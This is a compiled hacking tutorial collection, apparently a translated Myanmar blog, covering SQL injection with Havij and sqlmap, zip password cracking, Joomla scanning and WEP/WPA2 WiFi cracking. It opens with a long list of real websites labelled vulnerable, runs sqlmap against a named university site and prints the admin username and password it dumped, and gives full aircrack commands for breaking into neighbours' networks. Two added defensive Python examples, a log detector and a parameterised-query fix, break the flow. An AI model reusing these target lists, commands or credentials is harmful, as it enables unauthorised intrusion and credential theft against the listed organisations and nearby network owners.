http://www.pokenav.net/blog_post.php?id=1019'
http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=19'
http://capturegis.com/pages.php?id=10'
http://www.saleemcarpets.com/prod_detail.php?ID=57'
http://www.beemabuild.co.uk/view_product.php?id=258'
http://www.coastal-koi.com/view_product.php?id=1393'
http://mapleislandsales.com/product_detail.php?ID=78'
http://www.sigmaspa.com/web/prod_detail.php?ID=216'
http://www.familiscope.ie/main.php?ID=3'
http://biomed.eng.cmu.ac.th/index.php?newsdetail.php&id=63'
http://www.justcampagne.fr/en/produit.php?id_cat=2&id=88&id_coul=12'
http://www.checkersindustrial.com/product.php?id=74'
http://www.craftaustralia.org.au/library/review.php?id=ghost_nets'
http://www.girls.njpanthers.com/preview.php?id=25'
http://linkinthebox.com/productinfo.php?id=109'
http://www.guruslodge.com/index.php?topic=6484.0'
http://www.edseven.com/item_look.php?id=13'
http://www.pioneer-group.co.uk/event.php?id=16'
http://www.minesandcommunities.org/look.php?id=54'
http://www.nmtf.co.uk/index.php?id_cpg=1'
http://www.bia2.com/music-review/review.php?id=182'
http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421'
http://www.rentray.nl/over_rentray.php?id=11'
http://www.hotproperties-bayarea.com/readnews.php?id=11'
http://www.wellydiecast.com/product_detail.php?id=1070'
http://www.cometantenna.com/newPro_detail.php?ID=264'
http://www.wellydiecast.com/product_detail.php?id=7'
http://www.bulletproofautomotive.com/catalog-detail.php?ID=7265'
http://www.robotech.com/community/forum/messages.php?id=23'
http://komagan.net/readnews.php?id=5'
http://www.humormillnews.com/hmill/read.php?id=13'
http://www.natalpress.com.br/humor.php?id=10627'
http://www.yboaofnc.com/event.php?id=8'
http://www.highlandvillage.org/event.php?id=7'
http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418'
http://familynewsabout.com/aboutBook.php?id=3241'
http://www.saumon-fqsa.qc.ca/en/section.php?ID=16'
http://www.cupid.biz/support/opinions.php?id=46'
http://www.traikos.us/trends_opinions.php?id=5'
http://riyadhtravel.net/show.php?id=3'
http://old.brownsvilleherald.com/opinions.php?id=1590'
http://www.zigzagweeklynews.com/opinions.php?ID=6143'
http://www.pcofiowa.com/news.php?id=15'
http://www.fn-franchecomte.com/communique_detail.php?id=29'
http://www.faithinplace.org/news.php?ID=58'
http://www.sedicifilm.it/games.php?id_cat3=55'
http://www.vertexlaw.co.uk/news/detail.php?id=000171'
http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=321'
http://www.wildarttaxidermy.co.uk/gallery.php?id=16'
http://www.highlandvillage.org/event.php?id=72'
http://www.inner-live.com/index.php?task=channels&action=view&channel_id=339'
http://www.llangollen-railway.co.uk/event.php?id=80'
http://www.fundraisingnetwork.org/cat-Games.php?id=39'
http://www.midlandairmuseum.co.uk/news.php?id=16'
http://core.materials.ac.uk/search/detail.php?id=1300'
http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233'
http://www.bsp.org.uk/news_full.php?id=55'
http://www.clickautographs.com/detail.php?id=1611'
http://flatbearconsulting.com/pages.php?id_pag=6'
http://www.cross.tv/52818?channel_id=1104'
http://www.dmgems.co.uk/pages.php?id_sec=2'
http://capturegis.com/pages.php?id=10'
http://www.minesandcommunities.org/look.php?id=101'
http://www.clickautographs.com/detail.php?id=972'
http://www.dentistry.co.uk/news/news_detail.php?id=808'
http://www.familiscope.ie/main.php?ID=3'
http://www.constructionspares.com/main.php?ID=6'
http://www.theshootinggamepage.com/displaygames.php?id=32'
http://www.punp.edu.ph/main.php?id=33'
http://www.notebookfocus.com/readnews.php?id=343'
http://www.westcliffepublishers.com/detail.php?id=345'
http://www.seanscottphotography.com.au/shop_category.php?id=2'
http://cherokeeguitar.com/product-detail.php?id=19'
http://www.bombasticlife.com/place/review.php?id=504'
http://www.sedicifilm.it/games.php?id_cat3=61'
http://www.thecompletepianist.com/material.php?id=7'
http://www.digitaldickens.com/section.php?id=6'
http://www.ec21th.com/productinfo.php?id=194'
http://www.shoppingtang.com/productinfo.php?id=103'
http://www.hbztrade.com/productinfo.php?id=273'
http://www.kingslynnarts.co.uk/whatson_event.php?id=46'
http://www.sheridan-uk.com/news_detail.php?id=52'
http://mappn.com/game.php?id=11'
https://powertraveller.com/news/detail.php?id=000126'
http://lemhiweb.com/news.php?id=36'
http://www.communityinclusion.org/staff.php?staff_id=21'
http://games.zbeng.net/game.php?id=13'
http://www.drummajorinstitute.org/events/unique_event.php?ID=38'
http://www.falltvpreview.com/show.php?id=1037'
http://dvdholocaust.com/review.php?id=68'
http://dvdmaniacs.net/review.php?id=974'
http://www.mvsport-tuning.com/viewProduct.php?id=23'
http://www.allnations.net/equipment/prodinfo.php?ID=283'
http://www.amoryssolicitors.com/main.php?ID=1'
http://www.twitney.co.uk/theme.php?id=5'
http://ethansreview.com/website.php?id=1'
http://www.henleystandard.co.uk/news/news.php?id=36113'
http://www.drinksontario.com/memberinfo.php?id=70'
http://www.svasweb.org/news.php?id=77'
http://www.henleystandard.co.uk/news/news.php?id=799582'
http://www.thejewishmuseum.org/site/pages/event.php?id=348'
http://www.ngo-monitor.org/article.php?id=1564'
http://wminyc.org/event.php?id=1072'
http://www.abalar.es/ampliar_material.php?id_material=11'
http://stadiumsportsllc.com/news_view.php?id=20'
http://www.geneticsandsociety.org/article.php?id=282'
http://www.worldmusicinstitute.org/event.php?id=906'
http://ohr.edu/ask_db/ask_main.php?id_number=222'
http://www.shirtsenletters.nl/nav/artikel_info.php?id=631'
http://baywoodbest.com/listingPop.php?Id=620'
http://www.shirtsenletters.nl/nav/artikel_info.php?id=1377'
http://www.seanscottphotography.com.au/shop_category.php?id=1'
http://www.edseven.com/item_look.php?id=4'
http://www.peabody.uga.edu/news/event.php?id=59'
http://www.waukee.org/event.php?id=19'
http://bulacandeped.org/viewannounce.php?id=4'
http://www.tourisme-boulognesurmer.com/shopping.php?id=36'
http://www.feicuidao.com/jqzx_look.php?id=29'
http://www.bernard-vidal.com/view-photo.php?id=76'
http://www.portalararuna.com.br/2011/humor.php?id=10'
http://www.spraywaysingapore.com/proddetail.php?ID=17'
http://propartsllc.com/prodDetail.php?ID=596'
http://www.spraywaysingapore.com/proddetail.php?ID=13'
http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=16'
http://www.equality-ne.co.uk/readnews.php?id=3728'
http://www.plusline.org/article.php?id=4695'
http://www.medpharma-ae.com/showpost.php?id=68'
http://www.guitars4you.co.uk/product-detail.php?id=413'
http://www.girls.njpanthers.com/preview.php?id=21'
http://www.trumanlibrary.org/photographs/view.php?id=392'
http://www.gocontempo.com/pages.php?id=2'
http://ohr.edu/ask_db/ask_main.php?id_number=1310'
http://www.glac.fr/en/produit.php?id=47'
http://www.fanfics.ru/read.php?id=1515'
http://www.dvdmaniacs.net/review.php?id=318'
http://www.ath-elite.com.au/trainers.php?id=28'
http://www.cheap-web-hosting-info.com/hosting_review.php?id=8'
http://www.benlongfineart.com/news.php?id=13'
http://gp.org/speakers/detail.php?ID=42'
http://inrecs.com/releases.php?id=1'
http://www.konceive.com.au/riverside/investAnnounce.php?id=43'
http://www.armorysquareofsyracuse.com/main/shopping.php?id=179'
http://senl.com/nav/artikel_info.php?id=1388'
http://www.valiani.com/computerised_detail.php?ID=1'
http://dailyexhibit.com/theme.php?id=1224'
http://www.atitelemetry.com/viewapp.php?id=7'
http://www.oldtimephotos.org/gallery.php?id=11'
http://shohomes.com/gallery.php?id=10'
http://www.walesdirectory.co.uk/events/event.php?id=2445'
http://www.nowgen.org.uk/facilities/events/event.php?id=11'
http://thehimalayantimes.com/tgifnfw11/theme.php?id=259'
http://www.cfnielsen.com/material.php?id=17'
http://www.justcampagne.fr/en/produit.php?id_cat=5'
http://www.glac.fr/en/produit.php?id=76'
http://www.planetbollywood.com/displayReview.php?id=m101411095354'
http://www.alte.org/news/newsitem.php?newsID=209'
http://www.leadacidbatteryinfo.org/newsdetail.php?id=18'
http://www.suagacollection.com/photo-gallery.php?id=1'
http://www.bonsaitrees.com/gallery.php?id=7'
http://senl.com/nav/artikel_info.php?id=574'
https://www.camillushouse.org/news_center/news_detail.php?ID=78'
http://www.liquidafrica.com/newsdetail.php?id=1246'
http://rainydaymv.com/toys/games-toys-all-ages.php?id=35'
http://www.robotech.com/community/forum/messages.php?id=24'
http://www.planetbollywood.com/displayArticle.php?id=s011911120004'
http://www.aquasignal.info/us/cms/htdocs/main.php?id=209'
http://www.kudosshowers.co.uk/gallery.php?id=3'
http://www.scotclimb.org.uk/gallery.php?id=83'
http://mayfairgames.com/game.php?id=212'
http://www.gorodokboxing.com/material.php?id=1'
http://www.amandala.com.bz/newsadmin/preview.php?id=28'
http://www.wildarttaxidermy.co.uk/gallery.php?id=86'
http://www.scotclimb.org.uk/gallery.php?id=3'
http://www.bonsaitrees.com/gallery.php?id=4'
http://dvdholocaust.com/review.php?id=577'
http://ultimatehomedesign.com/news-detail.php?id=312'
http://www.beemabuild.co.uk/view_product.php?id=258'
http://www.whatwhenwhere.ie/event.php?id=382'
http://www.djinsure.com/faq/viewFAQ.php?id=13'
http://www.wcac.org/show.php?id=1'
http://www.ebambi.com/profile_view.php?id=100000252'
http://www.polkatheatre.com/event.php?id=43'
http://www.2hgs.com/detail_humor.php?ID=38'
http://www.melbournefineart.com.au/gallery.php?id=18'
http://www.2hgs.com/detail_humor.php?ID=27'
http://www.individualcars.com/inventory/detail.php?ID=685'
http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1'
http://www.djinsure.com/faq/viewFAQ.php?id=8'
http://www.techvision.co.uk/news.php?id=45'
http://www.nihonmono.com/prod_detail.php?id=11000384'
http://www.nissi-beach.com/section.php?id=13'
http://spokesrecords.com/releases.php?id=12'
http://www.hotproperties-bayarea.com/readnews.php?id=2'
http://asptt.com/running-tour/participant.php?id=14785'
http://www.kagakribet.com/humor.php?id=147'
http://www.ceripp.it/curriculum.php?id=9'
http://www.widescreenreview.com/news_detail.php?id=19267'
http://lucklyinthebox.com/productinfo.php?id=1155'
http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=51'
http://www.yboaofnc.com/event.php?id=3'
http://www.nsche.org.ng/communiquedetail.php?ID=2'
http://www.nsche.org.ng/communiquedetail.php?ID=3'
http://www.4wdsystems.com.au/index.php?id=29'
The list of vulnerable websites above is as published by H1N1 Hacker.
Performing an SQL Injection Attack Using Software
SQL injection can also be carried out using software. Because such software is written for the particular conditions it targets, it will not work for testing every site. We will try an SQL attack with the tool called Havij. Many people have had success using Havij. I will give download links below for the tools needed for SQL injection. First, download Havij. Then enter a website that has an SQL vulnerability into Havij's Target field. A sample is shown in the picture.
In the Target field, enter the SQL-vulnerable site you want to work on. Then click Analyze.
In the picture below it is scanning; at the end the Current Database appears and the tables show up.
When the table appears as in the picture above, click it. You will see one main table. On this site the main table is flashin_sparkms. Click the Get Table button again. After clicking Get Table you will see tables such as a User table and an Admin table. Tick the one you want, whether the Admin table or the User table. Then click GET Column. It is shown in the picture below.
After clicking GET Columns, as in that picture, you will see Password columns and Id columns. Since the passwords may be in those, tick them and click Get data.
At that point you obtain the usernames and passwords for Admin, user and Id. To log in with the passwords you obtained, if you cannot find the target site's login page, Havij includes a Find Admin function. Search with it and you can reach the login page.
That is the end of pen testing with Havij. Testing patiently is your own responsibility.
SQL Injection Using Back Track's SQL Map
We will now try an SQL injection using Back Track.
1. First, I chose the following site, which has an SQL vulnerability.
http://www.hu.edu.pk/viewfaculty.php?id=12
2. Then type cd /pentest/database/sqlmap in the BT terminal.
3. Type the command below. Put in your own target.
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12
-u refers to the vulnerable URL. Continue by typing the commands below.
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs
or
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
We use --dbs to show the related databases; if you use --current-db, only the one main database concerned is shown.
With --current-db we now have one database name. Here it is c3results. The name will differ depending on your target. Substitute your own database name in the command.
Type the command below.
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables
Adding --tables pulls out the tables in the website.
To get the admin columns, the command below is used.
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns
Now we have the names from our target….
Continue with the command below; it retrieves the Admin, Id and Password values.
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump
Finally, we obtained the admin user and password.
Shown below is the admin access obtained from our pen test.
Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123
………………………………………………………………………………………………..
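The Havij and sqlmap runs described above leave recognisable requests in the target's web server access log. The following added example (not part of the original tutorial) flags them; the log lines, paths and addresses are constructed samples and the rule names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [27/May/2012:10:00:01 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux i686)"
203.0.113.77 - - [27/May/2012:10:02:11 +0000] "GET /news.php?id=12%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.5 - - [27/May/2012:10:03:40 +0000] "GET /news.php?id=12%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
198.51.100.5 - - [27/May/2012:10:03:41 +0000] "GET /news.php?id=-12+UNION+ALL+SELECT+NULL%2Ctable_name+FROM+information_schema.tables HTTP/1.1" 200 734 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Rules run against URL-decoded parameter values, so %27 and + are seen as ' and space.
VALUE_RULES = {
    # A quote glued to a numeric id, like the id=18' URLs in the list above.
    "quote_around_number": re.compile(r"^(?:['\"]-?\d+|-?\d+\s*['\"])"),
    # Tautology tests such as AND 1=1.
    "boolean_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    # UNION-based extraction.
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    # Enumeration of databases, tables and columns.
    "schema_enumeration": re.compile(r"\binformation_schema\b", re.I),
}


def classify(target, user_agent):
    """Return the sorted list of rule names that one request triggers."""
    reasons = set()
    # sqlmap announces itself unless its User-Agent is changed, so this rule
    # is a cheap first signal and the value rules carry the rest.
    if user_agent.lower().startswith("sqlmap/"):
        reasons.add("tool_user_agent")
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for reason, rule in VALUE_RULES.items():
            if rule.search(value):
                reasons.add(reason)
    return sorted(reasons)


def scan(log_text):
    """Parse each log line and keep the requests that trigger a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        reasons = classify(m["target"], m["ua"])
        if reasons:
            findings.append({
                "ip": m["ip"],
                "target": m["target"],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return findings


def summarize(findings):
    """Group the triggered rules per client address for triage."""
    by_ip = {}
    for finding in findings:
        by_ip.setdefault(finding["ip"], set()).update(finding["reasons"])
    return {ip: sorted(reasons) for ip, reasons in by_ip.items()}


if __name__ == "__main__":
    for ip, reasons in summarize(scan(SAMPLE_LOG)).items():
        print(ip, ", ".join(reasons))
```

A 500 status on a flagged request, as in the second sample line, suggests the parameter reached the database unescaped and is worth fixing first.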
Countermeasures From SQL Attack (Ways to Defend Against SQL Attacks)
These are presented directly as pictures from CEH. What the pictures show is clear, and for beginners it is enough to keep it in mind as general knowledge.
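One core countermeasure, as an added example (not from the original tutorial or from CEH): the same id lookup written with string concatenation and then with input validation plus a bound parameter. Python's sqlite3 with an in-memory database stands in for the PHP/MySQL pages discussed; the faculty table, the function names and all rows are constructed, and admin and u_name mirror the names in the walkthrough.

```python
import re
import sqlite3

# Constructed hostile value for the id parameter (UNION-style, as in the list above).
INJECTED = "12 UNION SELECT id, u_name FROM admin"

# Only a short run of ASCII digits is a valid id.
ID_RE = re.compile(r"[0-9]{1,9}")


def make_db():
    """Build a constructed in-memory database; no real data is used."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE faculty (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, u_name TEXT, passwrd TEXT);
        INSERT INTO faculty VALUES (12, 'Dr. Example');
        INSERT INTO faculty VALUES (13, 'Dr. Sample');
        INSERT INTO admin VALUES (1, 'constructed_admin', 'constructed_secret');
    """)
    return conn


def lookup_concatenated(conn, raw_id):
    """Weak form: the request value becomes part of the SQL text."""
    sql = "SELECT id, name FROM faculty WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def leaks_db_error(conn, raw_id):
    """True when the weak form lets a database error surface for this value."""
    try:
        lookup_concatenated(conn, raw_id)
    except sqlite3.Error:
        return True
    return False


def lookup_hardened(conn, raw_id):
    """Hardened form: returns (http_status, rows).

    1. Validate the type before touching the database.
    2. Bind the value as a parameter so it can never be parsed as SQL.
    3. Answer database failures with a generic status, never the error text.
    """
    if not ID_RE.fullmatch(raw_id):
        return 400, []
    try:
        rows = conn.execute(
            "SELECT id, name FROM faculty WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        return 500, []  # details belong in the server log only
    return (200, rows) if rows else (404, [])


if __name__ == "__main__":
    conn = make_db()
    print("weak, normal id:   ", lookup_concatenated(conn, "12"))
    print("weak, hostile id:  ", lookup_concatenated(conn, INJECTED))
    print("weak, id with ':   ", "DB error exposed" if leaks_db_error(conn, "12'") else "ok")
    print("hardened, normal:  ", lookup_hardened(conn, "12"))
    print("hardened, hostile: ", lookup_hardened(conn, INJECTED))
    print("hardened, id with ':", lookup_hardened(conn, "12'"))
```

The bound parameter is the fix; the digit check and the generic error status are additional layers that also remove the error messages such tools rely on to confirm a finding.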
……………………………………………………………………………………………………………………………………….
REF: Ko Brb (Planet Creator), YouTube, Back Track Forum, H1n1 (mmcyberdevils), all ItemZ, CEH7, Google
Special Thz to: (G Tone MHU), BHG, Myanmar Cyber Army
Videos to watch on SQL injection
Sql injection attack Videos
http://www.youtube.com/watch?v=h-9rHTLHJTY
http://www.youtube.com/watch?v=jMQ2wdOmMIA
http://www.youtube.com/watch?v=PB7hWlqTSqs
http://www.youtube.com/topic/QJnLFoEO7Fs/?feature=results_main
http://www.youtube.com/watch?v=bORZlmyDw0s
http://www.youtube.com/watch?v=JqzWPLq7bJY
http://www.youtube.com/watch?v=0z1rt9Y-ON0
http://www.youtube.com/watch?v=qELByGfNJSE
How to use Havij: Videos
http://www.youtube.com/watch?v=Qvhdz8yE_po
http://www.youtube.com/watch?v=DMcaqCGHUVc
http://www.youtube.com/watch?v=JdgE7MSsBTc
http://www.youtube.com/watch?v=Ck5bifmAjZk
SQL injection with Back Track Videos
http://www.youtube.com/watch?v=ViezR1Qmcns
http://www.youtube.com/watch?v=hANMjTqFLD8
http://www.youtube.com/watch?v=-F1nBasky6E
http://www.youtube.com/watch?v=2cKJ5l9qYE0
http://www.youtube.com/watch?v=TqvLMWNTBYU
Havij Download ::::::: http://www.mediafire.com/download.php?r3ey1g20q1y69ka
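Success with the SQL injection technique tends to depend on patience and quick thinking. If you do not understand, make the effort and read it again. Do not skip over what you do not know; work at it step by step until you succeed. If one site does not work, try another. Do not rush. If it does not work, do not be discouraged and do not give up. Download the videos and study them carefully. If you watch the videos I have provided, you will not need to ask anyone; it will feel as if a teacher has come to sit beside you and teach.
If you are going to carry out a black attack, be mindful of cyber law. This is for Educational Purpose Only, so where attacking is concerned, what you test is your own responsibility.
With constant respect to all readers
Compiled and presented by - 3thic0kiddi3 (Ethic Kiddie) www.ethickiddie.blogspot.com
Books already published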
1.Wifi hacking basic
2.DNN hacking Basic
3.IIS Hacking Basic
4.Network Hacking Basic
5.Loic Tool DDOS Basic
6.SQL Injection Basic
Using Fcrackzip on Backtrack 5 Posted by Aung Kyaw Moe
Now I am writing about a tool included in Backtrack, a very useful one: Fcrackzip. As its name says, it is a small tool that cracks the passwords of zip files. Let's take a look.
We will create a new file. It is shown in the picture.
Now, using rar under wine, we will zip the new file we just created.
Through rar, we will zip the txt file from a moment ago. It is shown in the picture.
Next choose Advanced and enter a password of your choice. Since this is only a test, one of 3 to 6 characters is fine :P It is shown in the picture. After entering the password you like, click OK. Put the file on the Desktop so that it is easy to use.
Next, go to where fcrackzip is located: Application > Backtrack > Privilege Escalation > Password Attack > Offline Attack > Fcrackzip. It is also included among the Forensics tools. Let's start. See the picture.
Open fcrackzip and its usage will appear. It is shown in the picture.
OK, let's start. The usage command is fcrackzip -b -c a -l 1-5 -u /root/Desktop/hello.zip. I would like to digress a little here: the other day I saw that negative had answered a question asked in our Group. As said there, this is a brute force attack. Since negative has already explained it, I will not repeat it. Let's run the command above. It is shown in the picture :P
Password Found!!!!!!!!!!! pw= aung, it says. Fast, isn't it? For 3 to 6 characters it is very fast. The longer the password, the longer it takes. This time it took only a matter of seconds.
Most people set zip passwords of only up to about 6 characters. Some sites use their own site name as the password. Let's extract the archive to see whether the password is correct :P
OK, let's extract it and click OK. Let's see below whether it works :P
Thank you. I will keep trying. I would like to write better posts and tool tutorials than this, but even putting up a single post is a struggle, so all I can do is pray for a good connection.
Using Joomscan in Backtrack 5 R3 Posted by Aung Kyaw Moe
Now I will present Joomscan, which is included in Backtrack. It was written in our own country, Myanmar: it is a tool released by the YGN Ethical Hacker Group and written by Ko Aung Khant. We Myanmar people are capable too. Having a tool included in Backtrack is something to be proud of.
Let's begin. Since we are going to use Joomscan, I will say a little about it. It is a tool that checks whether Joomla-based sites are vulnerable. One more thing: a while ago, when Bengali sites were being attacked, it was quite useful, hee hee. OK, let's start. First, open joomscan.
This is the screen you will see after opening it. I recommend updating first. I have already done so.
Below are its options.
Next, look for a site, one that uses Joomla: search Google for "powered by joomla 1.5" and the like.
OK, pick one. Once you have picked, let's start scanning. Its command is ./joomscan.pl -u www.victim.com. See below.
The picture below shows the scan starting.
The picture below shows the scan finished. It says 5 vulns were found :P
OK, let's see which ones are vulnerable. Scroll up; there, the vulnerable entries are marked yes.
OK, let's open /htaccess.txt, the first vuln.
OK, I will only demonstrate this much. Try the remaining vulns yourself.
I will keep working hard.
Aung Kyaw Moe
WiFi Internet Connection Hacking
WEP,WPA2 Penetration Testing
5/27/2012 For Myanmar IT Beginners (Myanmar version)
3thic0kiddi3
Wifi Hacking Basic By 3thic0kiddi3
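WiFi lines have become plentiful in our country. Prices are still a little high, though, so not everyone
can use them yet, and for young people (those who are genuinely studying) even an internet line is
something to long for. This book is not a book that teaches you to steal and use WiFi. It explains that
WiFi can be cracked and then how to defend against that. It is for Educational Purpose Only. Knowing
this technique does not mean you can crack every WiFi line. You will come away understanding a little.
This book is written for Beginner Level. It is compiled from my own hands-on lessons and from online
lessons. Only the short essentials are presented. Hacking methods for both WEP and WPA are
presented.
A motto for this book
“Never forget the gratitude owed to someone who once fed you a single mouthful”
There is no hiding place for a bad deed…..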
Gathering the required items
One laptop, with either XP or 7 installed. Then one wireless USB adapter;
a TP-Link wireless adapter costs about 15000 kyats at the time of writing.
(The laptop must also have wireless.) Required software: Back Track 5 and VMware, that is all.
(It is best to have internet access to download the required software :P.) If you do not, you can
download it at an internet café.
Getting set up
Turn on the laptop. Then open a browser to download the software you need.
Back Track 5 is downloaded from www.backtrack-linux.org. At the time of writing,
Back Track 5R2 has already been released. Here I will demonstrate with Back Track 5. You do not
have to fill in the details it asks for before the download. As in the picture, choose GNOME, 32 Bit, VMware, Direct.
The download will then start. I downloaded it at an internet café. It took about 7 hours.
If you are on good terms with the internet café you can leave it downloading there. Do not let
the long wait discourage you; if you lose your perseverance you will never learn to do anything. Once you have
Back Track 5, unzip it. Then, to download VMware, go to www.vmware.com/products/player.
Download it and install VMware on the machine.
Installing VMware is easy and much like any other software. Once it is installed, choose
File > Open Virtual Machine as in the picture. Select the Back Track 5 zip you extracted on
your computer.
Then press Play Virtual Machine to start Back Track 5 running. You will see Back Track
booting. The picture shows the boot screen.
During boot it will ask for bt login. Enter root at bt login. Enter toor for Password.
Then type startx at root@bt, and BT 5 is up inside VMware. The picture shows it running.
You can now use Back Track 5 while still running Windows 7.
Back Track is a member of the Linux family. Both security people and hackers
use it. For anyone learning Linux, Back Track will be a help.
Trying to hack a WiFi line (WEP Cracking)
WiFi lines mostly come as WEP lines, WPA lines and WPA2 lines.
If you want to know what the abbreviations stand for, look them up on Google. For a beginner, not knowing WEP
from WPA is not a problem. WEP is easy to crack. There are plenty of tools and methods.
If there is a WEP line in the neighbourhood you want to break into, you will be pleased. Click the WiFi
connector on the laptop and you will see the WiFi lines around you. Click on those lines
and it shows which one is WEP and which one is WPA2-PSK. Now,
to hack WiFi, plug the wireless USB adapter into the laptop. Open Back Track 5 with
VMware. Open the Back Track Terminal, as shown in the picture. The Terminal
works on the same idea as cmd in Windows. It is where you type commands.
Type the first command.
Type airmon-ng and press Enter. Under Interface and Chipset it will show one line of details for the
adapter, such as wlan0. That means BT5 recognises the adapter and you can carry on.
Type the second command: airmon-ng start wlan0, then press Enter. One more line follows.
Type the third command: airodump-ng mon0, then press Enter. As soon as you type that command, every
WiFi line around you is listed. It shows which line is WEP and which is WPA2.
Your target wifi line is a WEP one (the WPA hack is covered later). Pick one of the WEP lines
you want to crack.
On my side, the line called laptopdct is a WEP line. The remaining WiFi lines are all WPA2 lines.
So I will try cracking the line called laptopdct. Note the number that identifies it, the BSSID:
C8:3A:35:2F:E7:30. The BSSID differs from one line to the next. Also note the CH; CH means Channel.
The Channel (CH) of laptopdct is 11. Then type one more command line.
The command is airodump-ng -w tuan -c 11 --bssid C8:3A:35:2F:E7:30 mon0.
Here tuan is the file name; you can use any name you like. After -c you must put the
CH number of your target. In place of C8:3A:35:2F:E7:30 you must put the BSSID of your
target. Then press Enter. The data status of your target's line will then be shown on its own.
See the picture.
Then open a new Terminal. Type aireplay-ng -1 0 -a C8:3A:35:2F:E7:30 mon0 and
press Enter. You will then see your requests being sent (sending auth). Then type one more
command line:
aireplay-ng -3 -b C8:3A:35:2F:E7:30 mon0. You will then see the request packets you sent
being read. The more that is read, the more your target's Data goes up
and the closer you get to your target's line. It is shown in the picture.
Wait until Data has gone up a lot. The chances of cracking get better. Here, do not fix
C8:3A:35:2F:E7:30 in your mind; the BSSID changes with the line. Also, in the aireplay commands,
if -1 or 0 and so on do not work, try other numbers, for example 2 or 3. It can vary
a little depending on the state of the target. The idea stays the same. In the picture you will see
Data going up after the 2 commands have been typed. You will be pleased. Now we have reached the last
step. Once Data has gone up a fair amount and a fair number of read packets have been read, it is
about ready to crack: type aircrack-ng tuan-01.cap. As I said earlier, any name you like can
go in place of tuan. So anyone who used a different name in place of tuan earlier has to
put that name here. For example, if it was ethickiddie, the command is aircrack-ng ethickiddie-01.cap.
If you do not know what name you gave, you can type ls in the Terminal to check. In the picture the aircrack
command has been typed, and with Opening tuan-01.cap it is cracking.
At the end, Aircrack will be searching for the password by itself. If it says Key Found
you will be very pleased. The picture shows the key cracked successfully.
The Key I obtained is 3132333132. That is the password of the target. Sometimes the key is shown
in a form such as A3:B5:C11:34:U7:F8:9Q:33; in that case the password is A3B5C1134U7F89Q33.
That completes WEP Cracking.
For the security of WEP owners
If you own a WiFi line and it is WEP, you should change it to WPA2.
WEP has become very easy to crack. You can also protect yourself by hiding the BSSID of your
line. If your internet line becomes too slow, restart it. Check whether the computers
connected inside your network are the right ones. Filter the MAC address of any computer
that comes onto the network to crack it. If even that does not work, let them use it. Have some pity.
…………………………………………………………………………………………………………………………………………
WPA2 Cracking (cracking a somewhat harder line)
Method ()
The principle is the same as for WEP. But the security of WPA is tight. Even the master
hackers break a sweat over it. To hack WPA2, the question is whether to do Packet Sniffing or a Dictionary
attack. For beginners the Dictionary attack is the most suitable.
I will write about Packet Sniffing later. The Dictionary attack is a simple method:
the password of the line you want to crack is matched against the Wordlist you have and cracked that way.
WPA2 can be cracked with this method. But when you meet strong passwords that contain special
characters, you have to give it time. If you have plenty of wordlists, cracking goes
more smoothly. Attacking WPA2 with a dictionary attack takes patience. You cannot stop it; it has to keep running.
You only get it with luck, and sometimes it comes in a moment. If your target has set a simple
password you are in luck and can crack it in a moment. Wordlists can be downloaded
from the internet; the well-known wordlists are 1.1million wordlist.txt and darkc0de.lst.
You can also search Google for WPA2 Crack wordlists and download them.
You can also find them on 4share. Here I will demonstrate with the 1.1 million wordlist and darkc0de.lst.
(1)1.1million wordlist.txt download
http://www.4shared.com/office/tvijWEkA/11million_word_list.html
(2)darkc0de.lst download
http://www.4shared.com/file/AF3e-0Em/darkc0de.html
First, open Back Track 5 again. Drag the 2 files you downloaded, the 1.1 million list and darkc0de,
into Backtrack 5 with the mouse (that is, move them). It is shown in the picture.
They are dragged from the Windows desktop.
Open the command box (terminal). Type airmon-ng and press Enter. It is shown in the picture. If your
adapter name is shown, you can carry on.
The next command is airmon-ng start wlan0, then press Enter.
The next command is airodump-ng mon0; press Enter and the WiFi lines around you
are listed. Pick one (WPA2-PSK) line that you want to hack.
On my side there is only one line, called Backt. It is WPA2-CCMP-PSK.
It is shown in the picture.
The BSSID of the Backt line I am going to crack is F8:DB:7F:46:1D:A1. The Channel (CH) is 1.
Copy down the data of your target carefully. Then type the next command:
